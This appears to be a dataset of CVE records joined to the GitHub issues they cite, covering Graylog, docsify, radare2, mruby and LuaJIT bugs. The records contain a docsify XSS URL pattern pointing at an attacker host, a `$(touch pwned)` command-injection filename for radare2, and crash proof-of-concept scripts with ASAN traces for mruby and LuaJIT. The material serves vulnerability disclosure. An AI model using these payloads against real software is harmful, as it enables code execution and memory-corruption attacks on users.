[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Graylog2/graylog2-server/issues/5906" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/Graylog2/graylog2-server/issues/5906" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:graylog:graylog:*:*:*:*:*:*:*:*", "matchCriteriaId": "F9A21A46-6422-4E60-ADAA-9605AB691F95", "versionEndExcluding": "3.3.3", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "295" ]
295
https://github.com/Graylog2/graylog2-server/issues/5906
[ "Third Party Advisory" ]
github.com
[ "Graylog2", "graylog2-server" ]
<!--- Provide a general summary of the issue in the Title above --> ## Expected Behavior <!--- If you're describing a bug, tell us what should happen --> <!--- If you're suggesting a change/improvement, tell us how it should work --> Graylog should verify the LDAP server certificate chain up to a trusted root, and refuse the connection when the certificate chain cannot be verified. ## Current Behavior <!--- If describing a bug, tell us what happens instead of the expected behavior --> <!--- If suggesting a change/improvement, explain the difference from current behavior --> Graylog accepts LDAP server certificates whose root certificate is not in any trust store. This presents a vulnerability for man-in-the-middle attacks. ## Possible Solution <!--- Not obligatory, but suggest a fix/reason for the bug, --> <!--- or ideas how to implement the addition or change --> ## Steps to Reproduce (for bugs) <!--- Provide a link to a live example, or an unambiguous set of steps to --> <!--- reproduce this bug. Include code to reproduce, if relevant --> 1. Navigate to the LDAP / Active Directory configuration page. 2. Enable LDAP, choose server type 'LDAP' and enter the address of a STARTTLS-enabled LDAP server, whose TLS certificate should not be verifiable by the server. Uncheck 'SSL' and 'Allow self-signed certificates'. Check 'StartTLS'. 3. Provide a bind DN and password in the 'System Username' and 'System Password' fields. 4. Click the 'Test Server Connection' button. ## Context <!--- How has this issue affected you? What are you trying to accomplish? --> <!--- Providing context helps us come up with a solution that is most useful in the real world --> We run Graylog in a Docker container, using [the official Docker image](https://hub.docker.com/r/graylog/graylog). Our LDAP server is on a different network. We would be better protected against man-in-the-middle attacks if Graylog verifies the LDAP server certificate. ## Your Environment <!--- Include as many relevant details about the environment you experienced the bug in --> * Graylog Version: 3.0.1 * Elasticsearch Version: 6.6.2 * MongoDB Version: 3.6.12 * Operating System: Debian 9 inside Graylog Docker container * Browser version: Firefox 60.6.1esr
LDAP connector does not verify TLS certificates
https://api.github.com/repos/Graylog2/graylog2-server/issues/5906/comments
3
2019-04-24T14:39:48Z
2020-08-03T11:26:01Z
https://github.com/Graylog2/graylog2-server/issues/5906
436,737,118
5,906
1,349
CVE-2020-7680
2020-07-20T16:15:12.350
docsify prior to 4.11.4 is susceptible to Cross-site Scripting (XSS). Docsify.js uses fragment identifiers (parameters after # sign) to load resources from server-side .md files. Due to lack of validation here, it is possible to provide external URLs after the /#/ (domain.com/#//attacker.com) and render arbitrary JavaScript/HTML inside docsify page.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/158515/Docsify.js-4.11.4-Cross-Site-Scripting.html" }, { "source": "report@snyk.io", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://packetstormsecurity.com/files/161495/docsify-4.11.6-Cross-Site-Scripting.html" }, { "source": "report@snyk.io", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2021/Feb/71" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://github.com/docsifyjs/docsify/issues/1126" }, { "source": "report@snyk.io", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/docsifyjs/docsify/pull/1128" }, { "source": "report@snyk.io", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory", "VDB Entry" ], "url": "http://packetstormsecurity.com/files/158515/Docsify.js-4.11.4-Cross-Site-Scripting.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "http://packetstormsecurity.com/files/161495/docsify-4.11.6-Cross-Site-Scripting.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://seclists.org/fulldisclosure/2021/Feb/71" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/docsifyjs/docsify/issues/1126" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/docsifyjs/docsify/pull/1128" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://snyk.io/vuln/SNYK-JS-DOCSIFY-567099" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:docsifyjs:docsify:*:*:*:*:*:*:*:*", "matchCriteriaId": "D61038D6-B6F5-4297-A237-100706E35264", "versionEndExcluding": "4.11.4", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/docsifyjs/docsify/issues/1126
[ "Third Party Advisory" ]
github.com
[ "docsifyjs", "docsify" ]
<!-- Please don't delete this template or we'll close your issue --> <!-- Please use English language --> <!-- Before creating an issue please make sure you are using the latest version of Docsify. --> <!-- Please ask questions on StackOverflow: https://stackoverflow.com/questions/ask?tags=docsify --> <!-- Please ask questions on gitter: https://gitter.im/docsifyjs/Lobby --> ## Bug Report I have found a security vulnerability in docsify.sj. How would you like me to report it? #### Steps to reproduce #### What is current behaviour #### What is the expected behaviour #### Other relevant information <!-- (Update "[ ]" to "[x]" to check a box) --> - [ ] Bug does still occur when all/other plugins are disabled? - Your OS: - Node.js version: - npm/yarn version: - Browser version: - Docsify version: - Docsify plugins: <!-- Love docsify? Please consider supporting our collective: 👉 https://opencollective.com/docsify/donate --> #### Please create a reproducible sandbox [![Edit 307qqv236](https://codesandbox.io/static/img/play-codesandbox.svg)](https://codesandbox.io/s/307qqv236) #### Mention the docsify version in which this bug was not present (if any)
vulnerability report
https://api.github.com/repos/docsifyjs/docsify/issues/1126/comments
17
2020-04-19T19:19:47Z
2021-02-05T05:56:29Z
https://github.com/docsifyjs/docsify/issues/1126
602,798,447
1,126
1,350
CVE-2020-15121
2020-07-20T18:15:12.187
In radare2 before version 4.5.0, malformed PDB file names in the PDB server path cause shell injection. To trigger the problem it's required to open the executable in radare2 and run idpd to trigger the download. The shell code will execute, and will create a file called pwned in the current directory.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 6.8, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 7.4, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 4, "source": "security-advisories@github.com", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.6, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "security-advisories@github.com", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/commit/04edfa82c1f3fa2bc3621ccdad2f93bdbf00e4f9" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/16945" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/pull/16966" }, { "source": "security-advisories@github.com", "tags": [ "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/security/advisories/GHSA-r552-vp94-9358" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MWC7KNBETYE5MK6VIUU26LUIISIFGSBZ/" }, { "source": "security-advisories@github.com", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YE77P5RSE2T7JHEKMWF2ARTSJGMPXCFY/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/commit/04edfa82c1f3fa2bc3621ccdad2f93bdbf00e4f9" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/issues/16945" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/pull/16966" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/radareorg/radare2/security/advisories/GHSA-r552-vp94-9358" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/MWC7KNBETYE5MK6VIUU26LUIISIFGSBZ/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YE77P5RSE2T7JHEKMWF2ARTSJGMPXCFY/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:radare:radare2:*:*:*:*:*:*:*:*", "matchCriteriaId": "C2252909-1FFD-484D-AC5B-6227CD4FB1BA", "versionEndExcluding": "4.5.0", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:fedoraproject:fedora:31:*:*:*:*:*:*:*", "matchCriteriaId": "80F0FA5D-8D3B-4C0E-81E2-87998286AF33", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:o:fedoraproject:fedora:32:*:*:*:*:*:*:*", "matchCriteriaId": "36D96259-24BD-44E2-96D9-78CE1D41F956", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "78" ]
78
https://github.com/radareorg/radare2/issues/16945
[ "Third Party Advisory" ]
github.com
[ "radareorg", "radare2" ]
### Work environment | Questions | Answers |------------------------------------------------------|-------------------- | OS/arch/bits (mandatory) | N/A | File format of the file you reverse (mandatory) | PE | Architecture/bits of the file (mandatory) | N/A | r2 -v full output, **not truncated** (mandatory) | >= radare2 f9048c2a44b5c8e167a11f11aa2de0187b405952 ### Expected behavior `idpd` does not cause untrusted code execution on my system. ### Actual behavior Malformed PDB file names in the PDB server path cause shell injection via the following codepath: https://github.com/radareorg/radare2/blob/master/libr/bin/pdb/pdb_downloader.c#L93-L99 In effect, `$(...)` is not escaped properly, causing this issue. **Note that this is not an isolated case in the code base, `grep` for `r_sys_cmdf` or `r_sys_cmd` for more potential attack vectors.** ### Steps to reproduce the behavior Open the executable in radare2 and run `idpd` to trigger the download. The shell code will execute, and will create a file called `pwned` in the current directory. ### Additional Logs, screenshots, source-code, configuration dump, ... I have just used a hex editor to patch the `dbg_file` to `$(touch pwned)` in a PE file from the `radare2-testbins` repository. [ConsoleApplication1.zip](https://github.com/radareorg/radare2/files/4673454/ConsoleApplication1.zip) (password is `infected`) --- The example above is specific to the PDB downloader, but more investigation is required to uncover all the possible attack vectors in the radare2 code-base.
Command injection across r_sys_cmd*
https://api.github.com/repos/radareorg/radare2/issues/16945/comments
10
2020-05-24T12:20:29Z
2020-07-21T03:48:53Z
https://github.com/radareorg/radare2/issues/16945
623,853,564
16,945
1,351
CVE-2020-15866
2020-07-21T15:15:14.537
mruby through 2.1.2-rc has a heap-based buffer overflow in the mrb_yield_with_class function in vm.c because of incorrect VM stack handling. It can be triggered via the stack_copy function.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "HIGH", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 7.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mruby/mruby/issues/5042" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00006.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/mruby/mruby/issues/5042" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2022/05/msg00006.html" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:mruby:mruby:*:*:*:*:*:*:*:*", "matchCriteriaId": "5E24840A-138B-4CE3-AF5D-FB9426BB10A1", "versionEndExcluding": null, "versionEndIncluding": "2.1.1", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:mruby:mruby:2.1.2:rc:*:*:*:*:*:*", "matchCriteriaId": "67E95046-2DCD-4FB5-8EC5-0DD313FBD46B", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/mruby/mruby/issues/5042
[ "Exploit", "Third Party Advisory" ]
github.com
[ "mruby", "mruby" ]
A heap buffer overflow exists in `mrb_yield_with_class` function in `src/vm.c:767` triggered via `stack_copy`. The bug can be detected on Ubuntu-18.04 64-bit with ASAN-enabled mruby. It has been reproduced with mruby compiled with different compiler toolchains: `clang-9, clang-10, gcc-7.5`. The POC input and steps to reproduce are provided below. # POC Input ``` c=singleton_methods.sample( ) d=singleton_methods.method(c) d=d.call(d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d,d) ``` # Steps to reproduce ``` git clone https://github.com/mruby/mruby cd mruby CC=clang LDFLAGS="-fsanitize=address" CFLAGS="-fsanitize=address -g" make -j`nproc` ./bin/mruby poc.rb ``` # ASAN Report ``` ================================================================= ==9655==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x621000004d20 at pc 0x000000493c50 bp 0x7ffca1f00c60 sp 0x7ffca1f00428 WRITE of size 16 at 0x621000004d20 thread T0 #0 0x493c4f in __asan_memcpy (/tmp/mruby/bin/mruby+0x493c4f) #1 0x59be83 in stack_copy /tmp/mruby/src/vm.c:123:14 #2 0x5a6acf in mrb_yield_with_class /tmp/mruby/src/vm.c:767:5 #3 0x7e0c8f in mcall /tmp/mruby/mrbgems/mruby-method/src/method.c:131:11 #4 0x7dacb2 in method_call /tmp/mruby/mrbgems/mruby-method/src/method.c:148:10 #5 0x5b9819 in mrb_vm_exec /tmp/mruby/src/vm.c:1437:18 #6 0x5a9054 in mrb_vm_run /tmp/mruby/src/vm.c:935:12 #7 0x60090f in mrb_top_run /tmp/mruby/src/vm.c:2836:12 #8 0x6418ed in mrb_load_exec /tmp/mruby/mrbgems/mruby-compiler/core/parse.y:6512:7 #9 0x6425fd in mrb_load_file_cxt /tmp/mruby/mrbgems/mruby-compiler/core/parse.y:6521:10 #10 0x4c58cf in main /tmp/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:331:11 #11 0x7f7459aaeb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 #12 0x41c009 in _start (/tmp/mruby/bin/mruby+0x41c009) 0x621000004d20 is located 0 bytes to the right of 4128-byte region [0x621000003d00,0x621000004d20) allocated by thread T0 here: #0 0x494a69 in realloc (/tmp/mruby/bin/mruby+0x494a69) #1 0x612045 in mrb_default_allocf /tmp/mruby/src/state.c:68:12 #2 0x5249ab in mrb_realloc_simple /tmp/mruby/src/gc.c:211:8 #3 0x524fc4 in mrb_realloc /tmp/mruby/src/gc.c:225:8 #4 0x59b3d9 in stack_extend_alloc /tmp/mruby/src/vm.c:205:27 #5 0x59af08 in mrb_stack_extend /tmp/mruby/src/vm.c:226:5 #6 0x5a8f1d in mrb_vm_run /tmp/mruby/src/vm.c:932:3 #7 0x60090f in mrb_top_run /tmp/mruby/src/vm.c:2836:12 #8 0x6418ed in mrb_load_exec /tmp/mruby/mrbgems/mruby-compiler/core/parse.y:6512:7 #9 0x6425fd in mrb_load_file_cxt /tmp/mruby/mrbgems/mruby-compiler/core/parse.y:6521:10 #10 0x4c58cf in main /tmp/mruby/mrbgems/mruby-bin-mruby/tools/mruby/mruby.c:331:11 #11 0x7f7459aaeb96 in __libc_start_main /build/glibc-OTsEL5/glibc-2.27/csu/../csu/libc-start.c:310 SUMMARY: AddressSanitizer: heap-buffer-overflow (/tmp/mruby/bin/mruby+0x493c4f) in __asan_memcpy Shadow bytes around the buggy address: 0x0c427fff8950: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8960: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8980: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x0c427fff8990: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x0c427fff89a0: 00 00 00 00[fa]fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff89b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff89c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff89d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff89e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa 0x0c427fff89f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==9655==ABORTING ``` # Authors Prashast Srivastava (Purdue University) , Mathias Payer (EPFL)
Heap buffer overflow in mruby interpreter
https://api.github.com/repos/mruby/mruby/issues/5042/comments
1
2020-07-20T21:23:46Z
2020-07-21T03:54:12Z
https://github.com/mruby/mruby/issues/5042
662,278,596
5,042
1,352
CVE-2020-15890
2020-07-21T22:15:12.197
LuaJit through 2.1.0-beta3 has an out-of-bounds read because __gc handler frame traversal is mishandled.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LuaJIT/LuaJIT/issues/601" }, { "source": "cve@mitre.org", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00026.html" }, { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4501-1/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/LuaJIT/LuaJIT/issues/601" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://lists.debian.org/debian-lts-announce/2020/07/msg00026.html" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://usn.ubuntu.com/4501-1/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:luajit:luajit:*:*:*:*:*:*:*:*", "matchCriteriaId": "7369364F-A393-4616-B40E-8097CA70E957", "versionEndExcluding": null, "versionEndIncluding": "2.0.5", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:luajit:luajit:2.1.0:beta1:*:*:*:*:*:*", "matchCriteriaId": "50AC5D5E-8DFE-40F5-B46D-C8F4DD038E22", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:luajit:luajit:2.1.0:beta2:*:*:*:*:*:*", "matchCriteriaId": "934D02F3-A619-41AF-93B0-905D9426ED03", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:luajit:luajit:2.1.0:beta3:*:*:*:*:*:*", "matchCriteriaId": "E5411EE3-61B9-4F24-BE5A-E57F34F30F9E", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:debian:debian_linux:9.0:*:*:*:*:*:*:*", "matchCriteriaId": "DEECE5FC-CACF-4496-A3E7-164736409252", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null }, { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:o:canonical:ubuntu_linux:16.04:*:*:*:esm:*:*:*", "matchCriteriaId": "7A5301BF-1402-4BE0-A0F8-69FBE79BC6D6", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "125" ]
125
https://github.com/LuaJIT/LuaJIT/issues/601
[ "Exploit", "Third Party Advisory" ]
github.com
[ "LuaJIT", "LuaJIT" ]
Hi, we found a crash in LuaJit Version: 2.1. Git hash: `384d6d56f4a3841fdef607a511dda92a579af2ff` POC: ```lua a = newproxy ( true ) getmetatable ( a ) . __gc = function ( ) rep129 = load ( function ( ) collectgarbage ( ) ( ) end ) end for i = 1 , 10000000 do newproxy ( a ) end ``` Stack dump: ``` AddressSanitizer:DEADLYSIGNAL ================================================================= ==3119==ERROR: AddressSanitizer: SEGV on unknown address 0x7fe86c68800c (pc 0x0000004c7779 bp 0x7ffcaa608950 sp 0x7ffcaa6087c0 T0) ==3119==The signal is caused by a READ memory access. #0 0x4c7778 in lj_err_run /home/yongheng/LuaJit_asan/src/lj_err.c:607:10 #1 0x4c7b34 in err_msgv /home/yongheng/LuaJit_asan/src/lj_err.c:631:3 #2 0x4c7ec1 in lj_err_optype /home/yongheng/LuaJit_asan/src/lj_err.c:667:3 #3 0x4c8040 in lj_err_optype_call /home/yongheng/LuaJit_asan/src/lj_err.c:695:3 #4 0x55d32e in lj_meta_call /home/yongheng/LuaJit_asan/src/lj_meta.c:442:5 #5 0x548fcc in lj_vmeta_call (/home/yongheng/LuaJit_asan/src/luajit+0x548fcc) #6 0x611efc in reader_func /home/yongheng/LuaJit_asan/src/lib_base.c:390:3 #7 0x4f9fa3 in lex_more /home/yongheng/LuaJit_asan/src/lj_lex.c:49:19 #8 0x4f5580 in lex_next /home/yongheng/LuaJit_asan/src/lj_lex.c:65:65 #9 0x4f5580 in lj_lex_setup /home/yongheng/LuaJit_asan/src/lj_lex.c:418:3 #10 0x522a4e in cpparser /home/yongheng/LuaJit_asan/src/lj_load.c:36:8 #11 0x548baa in lj_vm_cpcall (/home/yongheng/LuaJit_asan/src/luajit+0x548baa) #12 0x5228dc in lua_loadx /home/yongheng/LuaJit_asan/src/lj_load.c:58:12 #13 0x6110c0 in lj_cf_load /home/yongheng/LuaJit_asan/src/lib_base.c:417:14 #14 0x5487b4 in lj_BC_FUNCC (/home/yongheng/LuaJit_asan/src/luajit+0x5487b4) #15 0x54ba14 in gc_call_finalizer 